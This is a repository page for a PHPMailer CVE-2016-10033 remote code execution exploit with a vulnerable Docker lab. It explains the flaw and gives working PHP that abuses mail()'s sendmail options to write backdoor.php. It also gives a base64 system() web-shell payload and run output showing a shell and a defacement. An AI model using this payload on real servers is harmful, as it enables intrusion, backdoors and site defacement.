• Stars
    star
    403
  • Rank 107,140 (Top 3 %)
  • Language
    PHP
  • License
    GNU General Publi...
  • Created almost 8 years ago
  • Updated almost 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PHPMailer < 5.2.18 Remote Code Execution exploit and vulnerable container

PHPMailer < 5.2.18 Remote Code Execution

Docker Pulls License

PHPMailer is the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily. Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more

PHPMailer before its version 5.2.18 suffer from a vulnerability that could lead to remote code execution (RCE). The mailSend function in the isMail transport in PHPMailer, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted From address.

Vulnerable environment

To setup a vulnerable environment for your test you will need Docker installed, and just run the following command:

docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033

And it will spawn a vulnerable web application on your host on 8080 port

vulnerable

Exploit

To exploit this target just run:

./exploit host:port

If you are using this vulnerable image, you can just run:

./exploit localhost:8080

After the exploitation, a file called backdoor.php will be stored on the root folder of the web directory. And the exploit will drop you a shell where you can send commands to the backdoor:

./exploit.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Running whoami
www-data
RemoteShell> 

And that's it, you have your shell. There is another exploit, which ilustrates another use case.

./deface.sh localhost:8080
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting localhost:8080
[+] Target exploited, acessing shell at http://localhost:8080/backdoor.php
[+] Checking if the backdoor was created on target system
[+] Backdoor.php found on remote system
[+] Placing your message in the server
[+] Job done, exiting

And if you visit the page again, you will see this:

defaced

Vulnerable code

Before this commit in class.phpmailer.php in a certain scenario there is no filter in the sender's email address special chars. This flaw can lead to a remote code execution, via mail function here.

Analysing the code, there is no filter in mailSend() function

        $params = null;
        //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver
        if (!empty($this->Sender)) {
            $params = sprintf('-f%s', $this->Sender);
        }

$this->Sender is directly appended to $params variable, which was filtered in validateAddress() function, but as it uses RFC 3696 specification, it allow certain characters which will break things. In this case, quotes:

In addition to quoting using the backslash character, conventional double-quote characters may be used to surround strings. For example

"Abc@def"@example.com

"Fred Bloggs"@example.com

are alternate forms of the first two examples above. These quoted forms are rarely recommended, and are uncommon in practice, but, as discussed above, must be supported by applications that are processing email addresses. In particular, the quoted forms often appear in the context of addresses associated with transitions from other systems and contexts; those transitional requirements do still arise and, since a system that accepts a user-provided email address cannot "know" whether that address is associated with a legacy system, the address forms must be accepted and passed into the email environment.

You can read the whole RFC here if you want. But also, if PHP version is inferior to 5.2.0, and there is no PCRE installed, $patternselect variable in validateAddress() will be set to noregex. It will cause the input will be able to avoid any regex check. It will only pass through a small verification:

            case 'noregex':
                //No PCRE! Do something _very_ approximate!
                //Check the address is 3 chars or longer and contains an @ that's not the first or last char
                return (strlen($address) >= 3
                    and strpos($address, '@') >= 1
                    and strpos($address, '@') != strlen($address) - 1);

Then, the code flow goes to mailPassthru() function, which, if running in safe_mode won't be vulnerable to this flaw, as the following code states it

        //Can't use additional_parameters in safe_mode
        //@link http://php.net/manual/en/function.mail.php
        if (ini_get('safe_mode') or !$this->UseSendmailOptions or is_null($params)) {
            $result = @mail($to, $subject, $body, $header);
        } else {
            $result = @mail($to, $subject, $body, $header, $params);
        }

But, if it isn't running in safe_mode, then our special parameter will be passed to mail() and, if we were lucky, it will get our file containing whatever we want to be written where we choose it to be wrote to.

Notes about PHP mail() function exploitation

The exploitation of PHP mail() function isn't a new thing, but it still alive and people still using it. To explain how it works, lets look at how mail() function is defined:

bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

There are several exploitation methods for different results, we will focus on the exploitation of the 5th parameter to get Remote Code Execution (RCE). The parameter $additional_parameters is used to pass additional flags as command line options to the program configured to send the email. This configuration is defined by the sendmail_path variable.

A security note from php official documentation:

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmiail option.

This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.

Considering the additional parameters that can be injectected we will use -X to exploit this flaw. More about the -X parameter

-X logfile
Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.

There are also some other interesting parameters that you should know that exist:

-Cfile
Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.

And

-O option=value
Set option option to the specified value. This form uses long names.

And for -O option, the QueueDirectory is the most interesting option there, this option select the directory in which to queue messages.

If you want to read the whole list of parameters and options, just man sendmail or read it online here

Based on this information, and the hability to control at least one of the other parameters, we can exploit the host. Bellow the steps for a successful exploitation:

  • Control $additional_parameters and another mail() parameter
  • Know a writeable diretory on target host which is accessible via the target system and user (www-data for example). Usually this directory can be anything bellow webroot (aka /var/www/html for another systems, /www for this example)
  • Any PHP payload that you want, we are using a simple system() payload in this example, with a spice of base64 and some special characters | to make it easier to parse.
  • Just assembly everything together !

Remember that the -X option will write the log file, that will contain among the log information your PHP payload, in the directory that you will inform. An example of a vulnerable PHP code:

$to = '[email protected]';
$subject = '<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>';
$message = 'Pwned';
$headers = '';
$options = '-OQueueDirectory=/tmp -X/www/backdoor.php';
mail($to, $subject, $message, $headers, $options);

If you execute the code above, it will create a log file in the /www/backdoor.php, this is the essence of this exploit.

Payload

Bellow the payload used in this example

<?php echo "|".base64_encode(system(base64_decode($_GET["cmd"])))."|"; ?>

I wanna chase bugs, now what ?

Want a easy, one command, way to try to spot this flaw ? Remind this magic grep command !

grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" *

Running it against this repository will result in

src/class.phpmailer.php:700:            $result = @mail($to, $subject, $body, $header, $params);

Credits

This vulnerability was found by Dawid Golunski.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (opsxcq) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.

More Repositories

1

exploit-CVE-2017-7494

SambaCry exploit and vulnerable container (CVE-2017-7494)
C
378
star
2

docker-vulnerable-dvwa

Damn Vulnerable Web Application Docker container
PHP
210
star
3

exploit-CVE-2014-6271

Shellshock exploit + vulnerable environment
Shell
203
star
4

psx-cue-sbi-collection

Collection of .cue e .sbi files for Playstation roms
Shell
202
star
5

tasker

Tasker is a multipurpose task runner
Java
194
star
6

docker-tor-hiddenservice-nginx

Easily setup a hidden service inside the Tor network
C
169
star
7

mirror-vxheaven.org

Vxheaven.org website's mirror
HTML
155
star
8

exploit-blacknurse

Black Nurse DOS attack
C
71
star
9

proxy-list

A curated list of free public proxy servers
71
star
10

meme-vibing-cat

Vibing Cat meme generator
Shell
68
star
11

mirror-fravia

Fravia's mirror, for old times's sake !
HTML
64
star
12

docker-metasploit

Metasploit framework with steroids
Dockerfile
59
star
13

exploit-cve-2017-5715

Spectre exploit
C
55
star
14

exploit-CVE-2016-6515

OpenSSH remote DOS exploit and vulnerable container
JavaScript
53
star
15

mirror-milw0rm

Milw0rm website's mirror ! For old time's sake !
HTML
45
star
16

docker-tor

TOR Server Docker image
Shell
39
star
17

mirror-textfiles.com

TextFiles.com mirror
Roff
35
star
18

docker-helloworld-http

Docker image to test HTTP load balancers
Shell
34
star
19

docker-dnsmasq

Dockerfile
33
star
20

exploit-CVE-2016-7434

NTPD remote DOS exploit and vulnerable container
C
23
star
21

mirror-blacksun.box.sk

Black Sun website mirror, for old times' sake !
HTML
21
star
22

ipblacklist-database

Blacklist ip addresses caught scanning or bruteforcing hosts
20
star
23

docker-vnc

Run GUI applications inside Docker using VNC
Shell
19
star
24

docker-dev-arduino

Arduino development environment in a container
Shell
17
star
25

docker-xmrig

XMrig miner in a container !
Dockerfile
15
star
26

exploit-phpldapadmin-remote-dump

phpldapadmin remote exploit and vulnerable container !
PHP
13
star
27

ansible-role-linux-desktop

Ansible role for a Debian desktop
Shell
12
star
28

docker-wayback-machine

Download websites from Archive.org in a docker container !
12
star
29

docker-transmission

Dockerized Transmission, the most popular opensource Torrent Client
Shell
12
star
30

mirror-cultdeadcow.com

Cult of Dead Cow website's mirror !
HTML
11
star
31

packer-ah

AH Executable Packer
Pascal
11
star
32

arduino-temperature-monitor

Full stack Arduino temperature monitor
C++
11
star
33

malware-sample-banker-FEFAD618EB6177F07826D68A895769A8

Brazilian banker malware identified by Notificacao_Infracao_De_Transito_99827462345231.js
11
star
34

mirror-hack.co.za

Hack.co.za old website mirror
C
10
star
35

ansible-role-linux-server

Basic role to setup Debian as a server
Shell
10
star
36

docker-devops

Devops toolbox in a box
Dockerfile
9
star
37

blog

https://strm.sh website source code
TeX
9
star
38

docker-wine

Wine in a container !
8
star
39

disassembler-borg

Borg disassembler 2.28
C++
8
star
40

docker-snapcast

Snapcast stream server in a docker container !
Dockerfile
7
star
41

debugger-netwalker

NetWalker Debugger
Assembly
7
star
42

mirror-acid.org

ACiD Productions website's mirror
HTML
7
star
43

exploit-MS09-050

Microsoft Windows 7 SMB2.0 Remote Blue Screen of Death
Java
6
star
44

patch-fallout-1-null-pointer

Patch for Fallout 1 to fix a null pointer on a certain map event
C
5
star
45

docker-bitcoind

Bitcoin Daemon server
Dockerfile
5
star
46

linux-web-controller

Simple Linux web interface to run some scripts
Python
5
star
47

exploit-CVE-2016-8016-25

McAfee Virus Scan for Linux multiple remote flaws (CVE 2016-8016, CVE 2016-8017, CVE 2016-8018, CVE 2016-8019, CVE 2016-8020, CVE 2016-8021, CVE 2016-8022, CVE 2016-8023, CVE 2016-8024, CVE 2016-8025)
5
star
48

ansible-role-host-backup

Host backup role for linux with GPG encryption and upload to S3
4
star
49

docker-qemu

Qemu and KVM in a container !
Dockerfile
4
star
50

prometheus-exporter-fujitsu

Fujitsu RX300 exporter for Prometheus
Go
4
star
51

cloralang

Clora Programming Language for Code Golfing
JavaScript
4
star
52

docker-openvpn

OpenVPN running in a container
Dockerfile
4
star
53

ansible-role-linux-maintenance

Debian 10 Ansible maintenance role
4
star
54

opsxcq

3
star
55

docker-telegram

Telegram in a container !
Dockerfile
3
star
56

docker-util-latex

Easily build your LaTeX documents in a container !
Shell
3
star
57

docker-apache

Vanilla apache with php in a container !
Shell
3
star
58

docker-nginx-balancer

[DEPRECATED] A simple load balancer with NGinx
Shell
3
star
59

docker-apt-cacher

Apt-get cache for faster builds
Dockerfile
2
star
60

docker-dev-linuxkit

Linuxkit development environment
Dockerfile
2
star
61

docker-dev-vue

Vuejs 2 development environment with vue-cli and yarn
Dockerfile
2
star
62

docker-dev-cpp

C and C++ development environment
C
2
star
63

docker-filebot

Filebot media organizer container
Dockerfile
2
star
64

docker-pystemon

Pystemon dockerized
Shell
2
star
65

docker-deluge

Deluge torrent daemon in a container
Shell
2
star
66

docker-test-git-ssh-server

Git server over ssh for integration tests
Shell
2
star
67

dev-node-brunch

Nodejs + Brunch development environment
1
star
68

ansible-role-samba

Ansible role for running Samba in a container
1
star
69

docker-mopidy

Mopidy network music player with google music support
Python
1
star
70

dev-kickstart

Build virtual machines with kickstart in a container !
Shell
1
star
71

docker-samba

Samba image for docker
Shell
1
star
72

docker-task-base

Docker base image for tasks, with curl, git, wget, python and a lot more !
1
star
73

docker-gmusic-uploader

Google Music Uploader in a container !
Python
1
star
74

docker-task

[DEPRECATED] A simple way to tasks in a container in intervals
Python
1
star